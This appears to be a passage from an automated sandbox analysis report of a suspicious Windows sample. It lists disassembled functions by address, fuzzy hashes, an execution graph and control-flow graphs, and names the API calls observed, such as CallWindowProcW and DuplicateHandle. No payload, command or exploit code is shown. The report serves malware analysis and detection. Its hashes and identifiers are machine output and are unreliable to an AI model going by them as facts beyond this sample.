                                                  • Snapshot File: hcaresult_10_2_148d000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 64c268df9d28f1648248a2d2b79d2ed51dd396f980182a5e23eff34252b6b0b5
                                                  • Instruction ID: e553d34108bd87114277adb58bd5aee9d78f73a2d01aeeb6bd36d920dc44a856
                                                  • Opcode Fuzzy Hash: 64c268df9d28f1648248a2d2b79d2ed51dd396f980182a5e23eff34252b6b0b5
                                                  • Instruction Fuzzy Hash: 9C210771904204DFDB05EF98D9C0B2ABBA5FB84324F20C66ED9094B3A6C336D446CA61
                                                  Function 0148D006 Relevance: .1, Instructions: 62COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.1786069367.000000000148D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0148D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_148d000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e33dee4b3c1e370b230b64b4fa63a1ea8fbdebbf61a5cb99a13d0c4a4717f26d
                                                  • Instruction ID: fdcb8991e77b508609af0903857d7c3bbb20f26b30d8825a69442bc1349c9cb9
                                                  • Opcode Fuzzy Hash: e33dee4b3c1e370b230b64b4fa63a1ea8fbdebbf61a5cb99a13d0c4a4717f26d
                                                  • Instruction Fuzzy Hash: 41217F755093808FDB02DF64D594716BF71EB46218F28C5DBD8498B2A7C33A980ACB62
                                                  Function 0147D3D3 Relevance: .1, Instructions: 56COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.1786013442.000000000147D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0147D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_147d000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                  • Instruction ID: 6b6a3b5fe1b35c1a5516b6f3c86dd83b2efe8c2e8addfc2d1190430ceddf3000
                                                  • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                  • Instruction Fuzzy Hash: 1411DF72804240DFDB12CF44D9C4B96BF71FF94324F24C2AAD9090B266C33AE45ACBA1
                                                  Function 0147D4BF Relevance: .1, Instructions: 56COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.1786013442.000000000147D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0147D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_147d000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                  • Instruction ID: dd997b71363bf34bd0b79dafbb7640e94279230e74976393c7ad3e994b0e9c5e
                                                  • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                  • Instruction Fuzzy Hash: 0F11E172804280CFCB12CF54D9C4B56BF71FF84328F24C6AAD8490B266C336D45ACBA1
                                                  Function 0148D1CF Relevance: .1, Instructions: 53COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.1786069367.000000000148D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0148D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_148d000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                  • Instruction ID: 6f99d3725832921e1a378031e1decee740edbbfe610836652896d2ce5b505e53
                                                  • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                  • Instruction Fuzzy Hash: EE11BB75904280DFDB02DF58C5C4B1ABFA1FB84324F24C6AAD8494B3A6C33AD44ACB61

                                                  Execution Graph

                                                  Execution Coverage:9.9%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:70
                                                  Total number of Limit Nodes:9
                                                  execution_graph 31013 6306110 31014 6306418 31013->31014 31015 6306138 31013->31015 31016 6306141 31015->31016 31019 6305398 31015->31019 31018 6306164 31020 63053a3 31019->31020 31022 630645b 31020->31022 31023 63053b4 31020->31023 31022->31018 31024 6306490 OleInitialize 31023->31024 31025 63064f4 31024->31025 31025->31022 31026 fac118 DuplicateHandle 31027 fac1ae 31026->31027 31028 fad688 31029 fad6b6 31028->31029 31032 fabd64 31029->31032 31031 fad6d6 31031->31031 31033 fabd6f 31032->31033 31034 fae6b7 31033->31034 31036 6307161 31033->31036 31034->31031 31039 6307172 31036->31039 31037 63075b0 WaitMessage 31037->31039 31038 630719a 31038->31034 31039->31037 31039->31038 31040 ebd01c 31041 ebd034 31040->31041 31042 ebd08e 31041->31042 31046 63019c1 31041->31046 31054 6301a19 31041->31054 31062 6301a28 31041->31062 31047 63019ce 31046->31047 31047->31042 31048 6301a89 31047->31048 31050 6301a79 31047->31050 31080 6300f94 31048->31080 31070 6301c68 31050->31070 31075 6301c59 31050->31075 31051 6301a87 31055 6301a28 31054->31055 31056 6301a89 31055->31056 31058 6301a79 31055->31058 31057 6300f94 CallWindowProcW 31056->31057 31059 6301a87 31057->31059 31060 6301c68 CallWindowProcW 31058->31060 31061 6301c59 CallWindowProcW 31058->31061 31060->31059 31061->31059 31063 6301a3e 31062->31063 31064 6301a89 31063->31064 31066 6301a79 31063->31066 31065 6300f94 CallWindowProcW 31064->31065 31067 6301a87 31065->31067 31068 6301c68 CallWindowProcW 31066->31068 31069 6301c59 CallWindowProcW 31066->31069 31068->31067 31069->31067 31072 6301c7c 31070->31072 31071 6301d08 31071->31051 31084 6301d20 31072->31084 31087 6301d10 31072->31087 31076 6301c68 31075->31076 31078 6301d20 CallWindowProcW 31076->31078 31079 6301d10 CallWindowProcW 31076->31079 31077 6301d08 31077->31051 31078->31077 31079->31077 31081 6300f9f 31080->31081 31082 630327a CallWindowProcW 31081->31082 31083 6303229 31081->31083 31082->31083 31083->31051 31085 6301d31 31084->31085 31092 63031bd 31084->31092 31085->31071 31088 6301d3e 31087->31088 31089 6301d1f 31087->31089 31088->31071 31090 6301d31 31089->31090 31091 63031bd CallWindowProcW 31089->31091 31090->31071 31091->31090 31093 63031c0 31092->31093 31094 6300f94 CallWindowProcW 31093->31094 31095 63031ca 31094->31095 31095->31085

                                                  Executed Functions

                                                  Function 06307161 Relevance: 1.9, APIs: 1, Instructions: 361COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1764 6307161-6307170 1765 6307172-6307198 1764->1765 1766 63071de-63071f2 1764->1766 1774 63071a1-63071d8 1765->1774 1775 630719a-630719c 1765->1775 1767 6307221-6307240 1766->1767 1768 63071f4-630721e 1766->1768 1777 6307242-6307248 1767->1777 1778 6307258-630725a 1767->1778 1768->1767 1774->1766 1786 6307609 1774->1786 1779 630765a-630766f 1775->1779 1780 630724a 1777->1780 1781 630724c-630724e 1777->1781 1783 6307279-6307282 1778->1783 1784 630725c-6307274 1778->1784 1780->1778 1781->1778 1788 630728a-6307291 1783->1788 1787 630760e-6307624 1784->1787 1786->1787 1787->1779 1790 6307293-6307299 1788->1790 1791 630729b-63072a2 1788->1791 1792 63072af-63072cc call 6305410 1790->1792 1793 63072a4-63072aa 1791->1793 1794 63072ac 1791->1794 1797 6307421-6307425 1792->1797 1798 63072d2-63072d9 1792->1798 1793->1792 1794->1792 1800 63075f4-6307607 1797->1800 1801 630742b-630742f 1797->1801 1798->1786 1799 63072df-630731c 1798->1799 1809 6307322-6307327 1799->1809 1810 63075ea-63075ee 1799->1810 1800->1787 1802 6307431-6307444 1801->1802 1803 6307449-6307452 1801->1803 1802->1787 1805 6307481-6307488 1803->1805 1806 6307454-630747e 1803->1806 1807 6307527-630753c 1805->1807 1808 630748e-6307495 1805->1808 1806->1805 1807->1810 1821 6307542-6307544 1807->1821 1811 63074c4-63074e6 1808->1811 1812 6307497-63074c1 1808->1812 1813 6307359-630736e call 6305434 1809->1813 1814 6307329-6307330 call 630541c 1809->1814 1810->1788 1810->1800 1811->1807 1848 63074e8-63074f2 1811->1848 1812->1811 1819 6307373-6307377 1813->1819 1823 6307335-6307337 1814->1823 1825 63073e8-63073f5 1819->1825 1826 6307379-630738b call 6305440 1819->1826 1827 6307591-63075ae call 6305410 1821->1827 1828 6307546-630757f 1821->1828 1823->1813 1829 6307339-6307357 call 6305428 1823->1829 1825->1810 1840 63073fb-6307405 call 6305450 1825->1840 1853 63073cb-63073e3 1826->1853 1854 630738d-63073bd 1826->1854 1827->1810 1846 63075b0-63075dc WaitMessage 1827->1846 1843 6307581-6307587 1828->1843 1844 6307588-630758f 1828->1844 1829->1819 1856 6307414-630741c call 6305468 1840->1856 1857 6307407-630740f call 630545c 1840->1857 1843->1844 1844->1810 1850 63075e3 1846->1850 1851 63075de 1846->1851 1861 63074f4-63074fa 1848->1861 1862 630750a-6307525 1848->1862 1850->1810 1851->1850 1853->1787 1868 63073c4 1854->1868 1869 63073bf 1854->1869 1856->1810 1857->1810 1866 63074fc 1861->1866 1867 63074fe-6307500 1861->1867 1862->1807 1862->1848 1866->1862 1867->1862 1868->1853 1869->1868
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.2912374781.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_6300000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2f94b11e5b1403fc0408742d0b0f41f2dd49d1d5158de8c00bc1be99740d703a
                                                  • Instruction ID: 119c4898ea2e1bfe61786d5ac9052124684b267c84d7ebd4580d47dadb5db26f
                                                  • Opcode Fuzzy Hash: 2f94b11e5b1403fc0408742d0b0f41f2dd49d1d5158de8c00bc1be99740d703a
                                                  • Instruction Fuzzy Hash: 95E13E30E00209DFEB54DFA9C954B9DBBF1BF48314F158564E409AF2A5DB70E949CB80
                                                  Function 06300F94 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1872 6300f94-630321c 1875 6303222-6303227 1872->1875 1876 63032cc-63032ec 1872->1876 1877 6303229-6303260 1875->1877 1878 630327a-63032b2 CallWindowProcW 1875->1878 1882 63032ef-63032fc 1876->1882 1885 6303262-6303268 1877->1885 1886 6303269-6303278 1877->1886 1879 63032b4-63032ba 1878->1879 1880 63032bb-63032ca 1878->1880 1879->1880 1880->1882 1885->1886 1886->1882
                                                  APIs
                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 063032A1
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.2912374781.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_6300000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID: CallProcWindow
                                                  • String ID:
                                                  • API String ID: 2714655100-0
                                                  • Opcode ID: 926fa3a9f03a42a23c9f1b8c8be9efcb25b1c5232bbd2e4862517960cf7272b6
                                                  • Instruction ID: 9a71b71b4b8cfe2c4090d96c3fd59153acd5406d199cfb34cd64cc62abb7e290
                                                  • Opcode Fuzzy Hash: 926fa3a9f03a42a23c9f1b8c8be9efcb25b1c5232bbd2e4862517960cf7272b6
                                                  • Instruction Fuzzy Hash: 7B4147B4A00306DFEB54CF89C448AAABBF9FF88314F24C459D519AB361D735A845CFA0
                                                  Function 00FAC110 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00FAC19F
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.2900042021.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_fa0000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: 202fd6c861e1c047d1d22a1ad1f9fa7aa4eb7dcb4c05a67c512ec9e4f10e39f4
                                                  • Instruction ID: 4bb220a785a74ec80322ad9a98e1e7b21769effba14bb127808e2009859f306a
                                                  • Opcode Fuzzy Hash: 202fd6c861e1c047d1d22a1ad1f9fa7aa4eb7dcb4c05a67c512ec9e4f10e39f4
                                                  • Instruction Fuzzy Hash: 4621E4B5D00258DFDB10CFA9D984ADEBFF5EB48310F14841AE918A3351D374A944CFA0
                                                  Function 00FAC118 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00FAC19F
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.2900042021.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_fa0000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: e20f0a561314d4f57b08079ec095c016b1ddfe2468c2656068b39e513d63e551
                                                  • Instruction ID: 15a8b0c76c29929a9ab9001f57131164494265f9acacb1ea4e5e85a3e44d1def
                                                  • Opcode Fuzzy Hash: e20f0a561314d4f57b08079ec095c016b1ddfe2468c2656068b39e513d63e551
                                                  • Instruction Fuzzy Hash: 4321E4B5900248DFDB10CFAAD984ADEFBF4EB48320F14801AE914A3311D374A944CFA4
                                                  Function 06306488 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • OleInitialize.OLE32(00000000), ref: 063064E5
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.2912374781.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_6300000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID: Initialize
                                                  • String ID:
                                                  • API String ID: 2538663250-0
                                                  • Opcode ID: 2bfd9e31a3ca726fc0d53e10c658dece30b433dca3f68e9d95c9297c76860951
                                                  • Instruction ID: 7f39e792a4723551e8110a47ebf7820d74d5a40b88ee00ecf943e21b4ab7dd22
                                                  • Opcode Fuzzy Hash: 2bfd9e31a3ca726fc0d53e10c658dece30b433dca3f68e9d95c9297c76860951
                                                  • Instruction Fuzzy Hash: 5F1142B18003488FCB20DFAAC449BDEFFF8EB48320F24841AD558A7210C374A548CFA4
                                                  Function 063053B4 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • OleInitialize.OLE32(00000000), ref: 063064E5
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.2912374781.0000000006300000.00000040.00000800.00020000.00000000.sdmp, Offset: 06300000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_6300000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID: Initialize
                                                  • String ID:
                                                  • API String ID: 2538663250-0
                                                  • Opcode ID: c6db9e3be2749e501a95356bc1bce4768b659812004efa444138aee6e61ffd7d
                                                  • Instruction ID: 23fbcf5131f448a4f9c8a4f1f53db6c591e9f3a016397fcc6a12a39ad1d379a7
                                                  • Opcode Fuzzy Hash: c6db9e3be2749e501a95356bc1bce4768b659812004efa444138aee6e61ffd7d
                                                  • Instruction Fuzzy Hash: 321130B58003489FDB20DF9AC449BDEBBF8EB49324F208459D518A7250C374A948CFA4
                                                  Function 00EBD01C Relevance: .1, Instructions: 72COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.2899294670.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_ebd000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d0ddea6f4141cf8f14ebd7d4d82199d9aa5b7866ddcaf642442919db2ca04a66
                                                  • Instruction ID: 624c97ea8905650674b5a68d6290c8e1a430d1aa06d561822802413e93c4ee0e
                                                  • Opcode Fuzzy Hash: d0ddea6f4141cf8f14ebd7d4d82199d9aa5b7866ddcaf642442919db2ca04a66
                                                  • Instruction Fuzzy Hash: 6D210475608200DFCB14EF14D9C4B67BFA6FB88318F24C56DD84A5B296D33AD847CA61
                                                  Function 00EBD005 Relevance: .1, Instructions: 62COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.2899294670.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_ebd000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 14acfc0da0d8d3aa18ad883a48d7669a389db2a4b5da51fe537475ac27c6d9b4
                                                  • Instruction ID: 4f1cb432e4cf66e8658b757a8bd1b0f1aa87acc53dfe0690c4172bb2b4ff3e85
                                                  • Opcode Fuzzy Hash: 14acfc0da0d8d3aa18ad883a48d7669a389db2a4b5da51fe537475ac27c6d9b4
                                                  • Instruction Fuzzy Hash: 5521837550D3808FCB02DF24D994756BF71EB46314F28C5DAD8498F2A7C33A980ACB62
                                                  Function 00EAD628 Relevance: .0, Instructions: 36COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.2899190213.0000000000EAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EAD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_ead000_NxmtwwVGOtEdjd.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: abe9a84ab9d056d3ba2c3179173d38fc57855e43f08afe40273e62e9d874adcb
                                                  • Instruction ID: 59857cd6ce2363c73ebb458b680b4c0bfb2145f2952a457cd15ffb5c08fc23b0
                                                  • Opcode Fuzzy Hash: abe9a84ab9d056d3ba2c3179173d38fc57855e43f08afe40273e62e9d874adcb
                                                  • Instruction Fuzzy Hash: 3FF09671408344AEE7108E16DCC4BA6FFA8EF95738F18C45AED0D5F686C279AC44CAB1